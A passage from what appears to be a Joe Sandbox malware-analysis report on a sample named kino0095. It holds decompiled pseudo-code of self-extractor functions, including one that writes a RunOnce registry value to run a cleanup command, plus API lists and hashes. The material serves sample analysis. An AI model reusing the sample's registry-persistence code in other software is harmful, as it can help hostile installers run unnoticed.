                                                                                                                                                                                                                                    			E010B34F0(struct HWND__* _a4, intOrPtr _a8, int _a12) {
				void* _t9;
				void* _t12;
				void* _t13;
				void* _t17;
				void* _t23;
				void* _t25;
				struct HWND__* _t35;
				struct HWND__* _t38;
				void* _t39;

				_t9 = _a8 - 0x10;
				if(_t9 == 0) {
					__eflags = 1;
					L19:
					_push(0);
					 *0x10b91d8 = 1;
					L20:
					_push(_a4);
					L21:
					EndDialog();
					L22:
					return 1;
				}
				_push(1);
				_pop(1);
				_t12 = _t9 - 0xf2;
				if(_t12 == 0) {
					__eflags = _a12 - 0x1b;
					if(_a12 != 0x1b) {
						goto L22;
					}
					goto L19;
				}
				_t13 = _t12 - 0xe;
				if(_t13 == 0) {
					_t35 = _a4;
					 *0x10b8584 = _t35;
					E010B43D0(_t35, GetDesktopWindow());
					__eflags =  *0x10b8184; // 0x1
					if(__eflags != 0) {
						SendMessageA(GetDlgItem(_t35, 0x83b), 0x464, 0, 0xbb9);
						SendMessageA(GetDlgItem(_t35, 0x83b), 0x465, 0xffffffff, 0xffff0000);
					}
					SetWindowTextA(_t35, "doza2");
					_t17 = CreateThread(0, 0, E010B4FE0, 0, 0, 0x10b8798);
					 *0x10b879c = _t17;
					__eflags = _t17;
					if(_t17 != 0) {
						goto L22;
					} else {
						E010B44B9(_t35, 0x4b8, 0, 0, 0x10, 0);
						_push(0);
						_push(_t35);
						goto L21;
					}
				}
				_t23 = _t13 - 1;
				if(_t23 == 0) {
					__eflags = _a12 - 2;
					if(_a12 != 2) {
						goto L22;
					}
					ResetEvent( *0x10b858c);
					_t38 =  *0x10b8584; // 0x0
					_t25 = E010B44B9(_t38, 0x4b2, 0x10b1140, 0, 0x20, 4);
					__eflags = _t25 - 6;
					if(_t25 == 6) {
						L11:
						 *0x10b91d8 = 1;
						SetEvent( *0x10b858c);
						_t39 =  *0x10b879c; // 0x0
						E010B3680(_t39);
						_push(0);
						goto L20;
					}
					__eflags = _t25 - 1;
					if(_t25 == 1) {
						goto L11;
					}
					SetEvent( *0x10b858c);
					goto L22;
				}
				if(_t23 == 0xe90) {
					TerminateThread( *0x10b879c, 0);
					EndDialog(_a4, _a12);
					return 1;
				}
				return 0;
			}












                                                                                                                                                                                                                                    0x010b34fb
                                                                                                                                                                                                                                    0x010b34fe
                                                                                                                                                                                                                                    0x010b3665
                                                                                                                                                                                                                                    0x010b3666
                                                                                                                                                                                                                                    0x010b3666
                                                                                                                                                                                                                                    0x010b3668
                                                                                                                                                                                                                                    0x010b366e
                                                                                                                                                                                                                                    0x010b366e
                                                                                                                                                                                                                                    0x010b3671
                                                                                                                                                                                                                                    0x010b3671
                                                                                                                                                                                                                                    0x010b3677
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b3677
                                                                                                                                                                                                                                    0x010b3504
                                                                                                                                                                                                                                    0x010b3506
                                                                                                                                                                                                                                    0x010b3507
                                                                                                                                                                                                                                    0x010b350c
                                                                                                                                                                                                                                    0x010b365b
                                                                                                                                                                                                                                    0x010b365f
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b3661
                                                                                                                                                                                                                                    0x010b3512
                                                                                                                                                                                                                                    0x010b3515
                                                                                                                                                                                                                                    0x010b35be
                                                                                                                                                                                                                                    0x010b35c1
                                                                                                                                                                                                                                    0x010b35d1
                                                                                                                                                                                                                                    0x010b35d8
                                                                                                                                                                                                                                    0x010b35de
                                                                                                                                                                                                                                    0x010b35f8
                                                                                                                                                                                                                                    0x010b3617
                                                                                                                                                                                                                                    0x010b3617
                                                                                                                                                                                                                                    0x010b3623
                                                                                                                                                                                                                                    0x010b3637
                                                                                                                                                                                                                                    0x010b363d
                                                                                                                                                                                                                                    0x010b3642
                                                                                                                                                                                                                                    0x010b3644
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b3646
                                                                                                                                                                                                                                    0x010b3652
                                                                                                                                                                                                                                    0x010b3657
                                                                                                                                                                                                                                    0x010b3658
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b3658
                                                                                                                                                                                                                                    0x010b3644
                                                                                                                                                                                                                                    0x010b351b
                                                                                                                                                                                                                                    0x010b351d
                                                                                                                                                                                                                                    0x010b354f
                                                                                                                                                                                                                                    0x010b3553
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b355f
                                                                                                                                                                                                                                    0x010b3565
                                                                                                                                                                                                                                    0x010b357c
                                                                                                                                                                                                                                    0x010b3581
                                                                                                                                                                                                                                    0x010b3584
                                                                                                                                                                                                                                    0x010b359b
                                                                                                                                                                                                                                    0x010b35a1
                                                                                                                                                                                                                                    0x010b35a7
                                                                                                                                                                                                                                    0x010b35ad
                                                                                                                                                                                                                                    0x010b35b3
                                                                                                                                                                                                                                    0x010b35b8
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b35b8
                                                                                                                                                                                                                                    0x010b3586
                                                                                                                                                                                                                                    0x010b3588
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b3590
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b3590
                                                                                                                                                                                                                                    0x010b3524
                                                                                                                                                                                                                                    0x010b3535
                                                                                                                                                                                                                                    0x010b3541
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b3549
                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • TerminateThread.KERNEL32(00000000), ref: 010B3535
                                                                                                                                                                                                                                    • EndDialog.USER32(?,?), ref: 010B3541
                                                                                                                                                                                                                                    • ResetEvent.KERNEL32 ref: 010B355F
                                                                                                                                                                                                                                    • SetEvent.KERNEL32(010B1140,00000000,00000020,00000004), ref: 010B3590
                                                                                                                                                                                                                                    • GetDesktopWindow.USER32 ref: 010B35C7
                                                                                                                                                                                                                                    • GetDlgItem.USER32(?,0000083B), ref: 010B35F1
                                                                                                                                                                                                                                    • SendMessageA.USER32(00000000), ref: 010B35F8
                                                                                                                                                                                                                                    • GetDlgItem.USER32(?,0000083B), ref: 010B3610
                                                                                                                                                                                                                                    • SendMessageA.USER32(00000000), ref: 010B3617
                                                                                                                                                                                                                                    • SetWindowTextA.USER32(?,doza2), ref: 010B3623
                                                                                                                                                                                                                                    • CreateThread.KERNEL32 ref: 010B3637
                                                                                                                                                                                                                                    • EndDialog.USER32(?,00000000), ref: 010B3671
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000001.00000002.437433001.00000000010B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010B0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437414550.00000000010B0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437491566.00000000010B8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437501771.00000000010BA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437501771.00000000010BC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_10b0000_kino0095.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: DialogEventItemMessageSendThreadWindow$CreateDesktopResetTerminateText
                                                                                                                                                                                                                                    • String ID: doza2
                                                                                                                                                                                                                                    • API String ID: 2406144884-612509477
                                                                                                                                                                                                                                    • Opcode ID: 7340ef4516c62ecd4c3528ed963400e779319a1bfd81adf8767689809764f868
                                                                                                                                                                                                                                    • Instruction ID: ad24352d89e94231d48ad774b0b29eb63ee8ffc410b571d1a6e05164d76114d0
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7340ef4516c62ecd4c3528ed963400e779319a1bfd81adf8767689809764f868
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 83318A75240301FBD7701F29ACCDEEA3E68F789B45F14891AF7C29A299CB7A8410CB54
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 010B4224 Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 132libraryloaderCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 50%
                                                                                                                                                                                                                                    			E010B4224(char __ecx) {
				char* _v8;
				_Unknown_base(*)()* _v12;
				_Unknown_base(*)()* _v16;
				_Unknown_base(*)()* _v20;
				char* _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char _v44;
				char _v48;
				char _v52;
				_Unknown_base(*)()* _t26;
				_Unknown_base(*)()* _t28;
				_Unknown_base(*)()* _t29;
				_Unknown_base(*)()* _t32;
				char _t42;
				char* _t44;
				char* _t61;
				void* _t63;
				char* _t65;
				struct HINSTANCE__* _t66;
				char _t67;
				void* _t71;
				char _t76;
				intOrPtr _t85;

				_t67 = __ecx;
				_t66 = LoadLibraryA("SHELL32.DLL");
				if(_t66 == 0) {
					_t63 = 0x4c2;
					L22:
					E010B44B9(_t67, _t63, 0, 0, 0x10, 0);
					return 0;
				}
				_t26 = GetProcAddress(_t66, "SHBrowseForFolder");
				_v12 = _t26;
				if(_t26 == 0) {
					L20:
					FreeLibrary(_t66);
					_t63 = 0x4c1;
					goto L22;
				}
				_t28 = GetProcAddress(_t66, 0xc3);
				_v20 = _t28;
				if(_t28 == 0) {
					goto L20;
				}
				_t29 = GetProcAddress(_t66, "SHGetPathFromIDList");
				_v16 = _t29;
				if(_t29 == 0) {
					goto L20;
				}
				_t76 =  *0x10b88c0; // 0x0
				if(_t76 != 0) {
					L10:
					 *0x10b87a0 = 0;
					_v52 = _t67;
					_v48 = 0;
					_v44 = 0;
					_v40 = 0x10b8598;
					_v36 = 1;
					_v32 = E010B4200;
					_v28 = 0x10b88c0;
					 *0x10ba288( &_v52);
					_t32 =  *_v12();
					if(_t71 != _t71) {
						asm("int 0x29");
					}
					_v12 = _t32;
					if(_t32 != 0) {
						 *0x10ba288(_t32, 0x10b88c0);
						 *_v16();
						if(_t71 != _t71) {
							asm("int 0x29");
						}
						if( *0x10b88c0 != 0) {
							E010B1680(0x10b87a0, 0x104, 0x10b88c0);
						}
						 *0x10ba288(_v12);
						 *_v20();
						if(_t71 != _t71) {
							asm("int 0x29");
						}
					}
					FreeLibrary(_t66);
					_t85 =  *0x10b87a0; // 0x0
					return 0 | _t85 != 0x00000000;
				} else {
					GetTempPathA(0x104, 0x10b88c0);
					_t61 = 0x10b88c0;
					_t4 =  &(_t61[1]); // 0x10b88c1
					_t65 = _t4;
					do {
						_t42 =  *_t61;
						_t61 =  &(_t61[1]);
					} while (_t42 != 0);
					_t5 = _t61 - _t65 + 0x10b88c0; // 0x2171181
					_t44 = CharPrevA(0x10b88c0, _t5);
					_v8 = _t44;
					if( *_t44 == 0x5c &&  *(CharPrevA(0x10b88c0, _t44)) != 0x3a) {
						 *_v8 = 0;
					}
					goto L10;
				}
			}




























                                                                                                                                                                                                                                    0x010b4234
                                                                                                                                                                                                                                    0x010b423c
                                                                                                                                                                                                                                    0x010b4240
                                                                                                                                                                                                                                    0x010b43b2
                                                                                                                                                                                                                                    0x010b43b7
                                                                                                                                                                                                                                    0x010b43c0
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b43c5
                                                                                                                                                                                                                                    0x010b424c
                                                                                                                                                                                                                                    0x010b4252
                                                                                                                                                                                                                                    0x010b4257
                                                                                                                                                                                                                                    0x010b43a4
                                                                                                                                                                                                                                    0x010b43a5
                                                                                                                                                                                                                                    0x010b43ab
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b43ab
                                                                                                                                                                                                                                    0x010b4263
                                                                                                                                                                                                                                    0x010b4269
                                                                                                                                                                                                                                    0x010b426e
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b427a
                                                                                                                                                                                                                                    0x010b4280
                                                                                                                                                                                                                                    0x010b4285
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b428d
                                                                                                                                                                                                                                    0x010b4293
                                                                                                                                                                                                                                    0x010b42e6
                                                                                                                                                                                                                                    0x010b42e9
                                                                                                                                                                                                                                    0x010b42ef
                                                                                                                                                                                                                                    0x010b42f4
                                                                                                                                                                                                                                    0x010b42f7
                                                                                                                                                                                                                                    0x010b4300
                                                                                                                                                                                                                                    0x010b4307
                                                                                                                                                                                                                                    0x010b430e
                                                                                                                                                                                                                                    0x010b4315
                                                                                                                                                                                                                                    0x010b431c
                                                                                                                                                                                                                                    0x010b4322
                                                                                                                                                                                                                                    0x010b4326
                                                                                                                                                                                                                                    0x010b432d
                                                                                                                                                                                                                                    0x010b432d
                                                                                                                                                                                                                                    0x010b432f
                                                                                                                                                                                                                                    0x010b4334
                                                                                                                                                                                                                                    0x010b4343
                                                                                                                                                                                                                                    0x010b4349
                                                                                                                                                                                                                                    0x010b434d
                                                                                                                                                                                                                                    0x010b4354
                                                                                                                                                                                                                                    0x010b4354
                                                                                                                                                                                                                                    0x010b435d
                                                                                                                                                                                                                                    0x010b436e
                                                                                                                                                                                                                                    0x010b436e
                                                                                                                                                                                                                                    0x010b437d
                                                                                                                                                                                                                                    0x010b4383
                                                                                                                                                                                                                                    0x010b4387
                                                                                                                                                                                                                                    0x010b438e
                                                                                                                                                                                                                                    0x010b438e
                                                                                                                                                                                                                                    0x010b4387
                                                                                                                                                                                                                                    0x010b4391
                                                                                                                                                                                                                                    0x010b4399
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b4295
                                                                                                                                                                                                                                    0x010b429f
                                                                                                                                                                                                                                    0x010b42a5
                                                                                                                                                                                                                                    0x010b42aa
                                                                                                                                                                                                                                    0x010b42aa
                                                                                                                                                                                                                                    0x010b42ad
                                                                                                                                                                                                                                    0x010b42ad
                                                                                                                                                                                                                                    0x010b42af
                                                                                                                                                                                                                                    0x010b42b0
                                                                                                                                                                                                                                    0x010b42b6
                                                                                                                                                                                                                                    0x010b42c2
                                                                                                                                                                                                                                    0x010b42c8
                                                                                                                                                                                                                                    0x010b42ce
                                                                                                                                                                                                                                    0x010b42e4
                                                                                                                                                                                                                                    0x010b42e4
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b42ce

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(SHELL32.DLL,?,?,00000001), ref: 010B4236
                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,SHBrowseForFolder), ref: 010B424C
                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,000000C3), ref: 010B4263
                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,SHGetPathFromIDList), ref: 010B427A
                                                                                                                                                                                                                                    • GetTempPathA.KERNEL32(00000104,010B88C0,?,00000001), ref: 010B429F
                                                                                                                                                                                                                                    • CharPrevA.USER32(010B88C0,02171181,?,00000001), ref: 010B42C2
                                                                                                                                                                                                                                    • CharPrevA.USER32(010B88C0,00000000,?,00000001), ref: 010B42D6
                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,00000001), ref: 010B4391
                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,00000001), ref: 010B43A5
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000001.00000002.437433001.00000000010B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010B0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437414550.00000000010B0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437491566.00000000010B8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437501771.00000000010BA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437501771.00000000010BC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_10b0000_kino0095.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: AddressLibraryProc$CharFreePrev$LoadPathTemp
                                                                                                                                                                                                                                    • String ID: SHBrowseForFolder$SHELL32.DLL$SHGetPathFromIDList
                                                                                                                                                                                                                                    • API String ID: 1865808269-1731843650
                                                                                                                                                                                                                                    • Opcode ID: f0c92a92c1042539099fcfc2f40d1f6eaf7bfab59a0edefaeb3533ad1af1f227
                                                                                                                                                                                                                                    • Instruction ID: a8dffaf84d90c3f1fedd66240e1e9760dd38a050ccab6d4dbb382a716bd7b994
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f0c92a92c1042539099fcfc2f40d1f6eaf7bfab59a0edefaeb3533ad1af1f227
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 27412B74A01204EFE7619F78E8D49EE7FB8EF44744F08859AE9C2E7256C7798901CB60
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 010B2773 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 114registryCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 94%
                                                                                                                                                                                                                                    			E010B2773(CHAR* __ecx, char* _a4) {
				signed int _v8;
				char _v268;
				char _v269;
				CHAR* _v276;
				int _v280;
				void* _v284;
				int _v288;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t23;
				intOrPtr _t34;
				int _t45;
				int* _t50;
				CHAR* _t52;
				CHAR* _t61;
				char* _t62;
				int _t63;
				CHAR* _t64;
				signed int _t65;

				_t52 = __ecx;
				_t23 =  *0x10b8004; // 0x72151d89
				_v8 = _t23 ^ _t65;
				_t62 = _a4;
				_t50 = 0;
				_t61 = __ecx;
				_v276 = _t62;
				 *((char*)(__ecx)) = 0;
				if( *_t62 != 0x23) {
					_t63 = 0x104;
					goto L14;
				} else {
					_t64 = _t62 + 1;
					_v269 = CharUpperA( *_t64);
					_v276 = CharNextA(CharNextA(_t64));
					_t63 = 0x104;
					_t34 = _v269;
					if(_t34 == 0x53) {
						L14:
						GetSystemDirectoryA(_t61, _t63);
						goto L15;
					} else {
						if(_t34 == 0x57) {
							GetWindowsDirectoryA(_t61, 0x104);
							goto L16;
						} else {
							_push(_t52);
							_v288 = 0x104;
							E010B1781( &_v268, 0x104, _t52, "Software\\Microsoft\\Windows\\CurrentVersion\\App Paths");
							_t59 = 0x104;
							E010B658A( &_v268, 0x104, _v276);
							if(RegOpenKeyExA(0x80000002,  &_v268, 0, 0x20019,  &_v284) != 0) {
								L16:
								_t59 = _t63;
								E010B658A(_t61, _t63, _v276);
							} else {
								if(RegQueryValueExA(_v284, 0x10b1140, 0,  &_v280, _t61,  &_v288) == 0) {
									_t45 = _v280;
									if(_t45 != 2) {
										L9:
										if(_t45 == 1) {
											goto L10;
										}
									} else {
										if(ExpandEnvironmentStringsA(_t61,  &_v268, 0x104) == 0) {
											_t45 = _v280;
											goto L9;
										} else {
											_t59 = 0x104;
											E010B1680(_t61, 0x104,  &_v268);
											L10:
											_t50 = 1;
										}
									}
								}
								RegCloseKey(_v284);
								L15:
								if(_t50 == 0) {
									goto L16;
								}
							}
						}
					}
				}
				return E010B6CE0(1, _t50, _v8 ^ _t65, _t59, _t61, _t63);
			}























                                                                                                                                                                                                                                    0x010b2773
                                                                                                                                                                                                                                    0x010b277e
                                                                                                                                                                                                                                    0x010b2785
                                                                                                                                                                                                                                    0x010b278a
                                                                                                                                                                                                                                    0x010b278d
                                                                                                                                                                                                                                    0x010b2790
                                                                                                                                                                                                                                    0x010b2792
                                                                                                                                                                                                                                    0x010b2798
                                                                                                                                                                                                                                    0x010b279d
                                                                                                                                                                                                                                    0x010b28b2
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b27a3
                                                                                                                                                                                                                                    0x010b27a3
                                                                                                                                                                                                                                    0x010b27af
                                                                                                                                                                                                                                    0x010b27c2
                                                                                                                                                                                                                                    0x010b27c8
                                                                                                                                                                                                                                    0x010b27cd
                                                                                                                                                                                                                                    0x010b27d5
                                                                                                                                                                                                                                    0x010b28b7
                                                                                                                                                                                                                                    0x010b28b9
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b27db
                                                                                                                                                                                                                                    0x010b27dd
                                                                                                                                                                                                                                    0x010b28aa
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b27e3
                                                                                                                                                                                                                                    0x010b27e3
                                                                                                                                                                                                                                    0x010b27ec
                                                                                                                                                                                                                                    0x010b27f8
                                                                                                                                                                                                                                    0x010b2803
                                                                                                                                                                                                                                    0x010b280b
                                                                                                                                                                                                                                    0x010b2831
                                                                                                                                                                                                                                    0x010b28c3
                                                                                                                                                                                                                                    0x010b28c9
                                                                                                                                                                                                                                    0x010b28cd
                                                                                                                                                                                                                                    0x010b2837
                                                                                                                                                                                                                                    0x010b285a
                                                                                                                                                                                                                                    0x010b285c
                                                                                                                                                                                                                                    0x010b2865
                                                                                                                                                                                                                                    0x010b2892
                                                                                                                                                                                                                                    0x010b2895
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b2867
                                                                                                                                                                                                                                    0x010b2878
                                                                                                                                                                                                                                    0x010b288c
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b287a
                                                                                                                                                                                                                                    0x010b2880
                                                                                                                                                                                                                                    0x010b2885
                                                                                                                                                                                                                                    0x010b2897
                                                                                                                                                                                                                                    0x010b2899
                                                                                                                                                                                                                                    0x010b2899
                                                                                                                                                                                                                                    0x010b2878
                                                                                                                                                                                                                                    0x010b2865
                                                                                                                                                                                                                                    0x010b28a0
                                                                                                                                                                                                                                    0x010b28bf
                                                                                                                                                                                                                                    0x010b28c1
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b28c1
                                                                                                                                                                                                                                    0x010b2831
                                                                                                                                                                                                                                    0x010b27dd
                                                                                                                                                                                                                                    0x010b27d5
                                                                                                                                                                                                                                    0x010b28e5

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • CharUpperA.USER32(72151D89,00000000,00000000,00000000), ref: 010B27A8
                                                                                                                                                                                                                                    • CharNextA.USER32(0000054D), ref: 010B27B5
                                                                                                                                                                                                                                    • CharNextA.USER32(00000000), ref: 010B27BC
                                                                                                                                                                                                                                    • RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 010B2829
                                                                                                                                                                                                                                    • RegQueryValueExA.ADVAPI32(?,010B1140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 010B2852
                                                                                                                                                                                                                                    • ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 010B2870
                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 010B28A0
                                                                                                                                                                                                                                    • GetWindowsDirectoryA.KERNEL32(-00000005,00000104), ref: 010B28AA
                                                                                                                                                                                                                                    • GetSystemDirectoryA.KERNEL32 ref: 010B28B9
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    • Software\Microsoft\Windows\CurrentVersion\App Paths, xrefs: 010B27E4
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000001.00000002.437433001.00000000010B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010B0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437414550.00000000010B0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437491566.00000000010B8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437501771.00000000010BA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437501771.00000000010BC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_10b0000_kino0095.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Char$DirectoryNext$CloseEnvironmentExpandOpenQueryStringsSystemUpperValueWindows
                                                                                                                                                                                                                                    • String ID: Software\Microsoft\Windows\CurrentVersion\App Paths
                                                                                                                                                                                                                                    • API String ID: 2659952014-2428544900
                                                                                                                                                                                                                                    • Opcode ID: 4bf8074129e9eb9d7354c2bf62bcc99ad5be33e8162a13c1fa58342f61d43b97
                                                                                                                                                                                                                                    • Instruction ID: c1048eb5ec48c636131ddffa676db567874802c0f4486ca78b616658ea790714
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4bf8074129e9eb9d7354c2bf62bcc99ad5be33e8162a13c1fa58342f61d43b97
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E741BF70A0012CABDB659B689CC4AFA7BBCEB15700F0040E9F5C9E3104CB759E828FA0
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 010B2267 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 88registryCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 62%
                                                                                                                                                                                                                                    			E010B2267() {
				signed int _v8;
				char _v268;
				char _v836;
				void* _v840;
				int _v844;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t19;
				intOrPtr _t33;
				void* _t38;
				intOrPtr* _t42;
				void* _t45;
				void* _t47;
				void* _t49;
				signed int _t51;

				_t19 =  *0x10b8004; // 0x72151d89
				_t20 = _t19 ^ _t51;
				_v8 = _t19 ^ _t51;
				if( *0x10b8530 != 0) {
					_push(_t49);
					if(RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x2001f,  &_v840) == 0) {
						_push(_t38);
						_v844 = 0x238;
						if(RegQueryValueExA(_v840, ?str?, 0, 0,  &_v836,  &_v844) == 0) {
							_push(_t47);
							memset( &_v268, 0, 0x104);
							if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
								E010B658A( &_v268, 0x104, 0x10b1140);
							}
							_push("C:\Users\hardz\AppData\Local\Temp\IXP001.TMP\");
							E010B171E( &_v836, 0x238, "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"",  &_v268);
							_t42 =  &_v836;
							_t45 = _t42 + 1;
							_pop(_t47);
							do {
								_t33 =  *_t42;
								_t42 = _t42 + 1;
							} while (_t33 != 0);
							RegSetValueExA(_v840, "wextract_cleanup1", 0, 1,  &_v836, _t42 - _t45 + 1);
						}
						_t20 = RegCloseKey(_v840);
						_pop(_t38);
					}
					_pop(_t49);
				}
				return E010B6CE0(_t20, _t38, _v8 ^ _t51, _t45, _t47, _t49);
			}



















                                                                                                                                                                                                                                    0x010b2272
                                                                                                                                                                                                                                    0x010b2277
                                                                                                                                                                                                                                    0x010b2279
                                                                                                                                                                                                                                    0x010b2283
                                                                                                                                                                                                                                    0x010b2289
                                                                                                                                                                                                                                    0x010b22ab
                                                                                                                                                                                                                                    0x010b22b1
                                                                                                                                                                                                                                    0x010b22c4
                                                                                                                                                                                                                                    0x010b22e0
                                                                                                                                                                                                                                    0x010b22e6
                                                                                                                                                                                                                                    0x010b22f5
                                                                                                                                                                                                                                    0x010b230d
                                                                                                                                                                                                                                    0x010b231c
                                                                                                                                                                                                                                    0x010b231c
                                                                                                                                                                                                                                    0x010b2321
                                                                                                                                                                                                                                    0x010b233a
                                                                                                                                                                                                                                    0x010b2342
                                                                                                                                                                                                                                    0x010b2348
                                                                                                                                                                                                                                    0x010b234b
                                                                                                                                                                                                                                    0x010b234c
                                                                                                                                                                                                                                    0x010b234c
                                                                                                                                                                                                                                    0x010b234e
                                                                                                                                                                                                                                    0x010b234f
                                                                                                                                                                                                                                    0x010b236e
                                                                                                                                                                                                                                    0x010b236e
                                                                                                                                                                                                                                    0x010b237a
                                                                                                                                                                                                                                    0x010b2380
                                                                                                                                                                                                                                    0x010b2380
                                                                                                                                                                                                                                    0x010b2381
                                                                                                                                                                                                                                    0x010b2381
                                                                                                                                                                                                                                    0x010b238f

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,0002001F,?,00000001), ref: 010B22A3
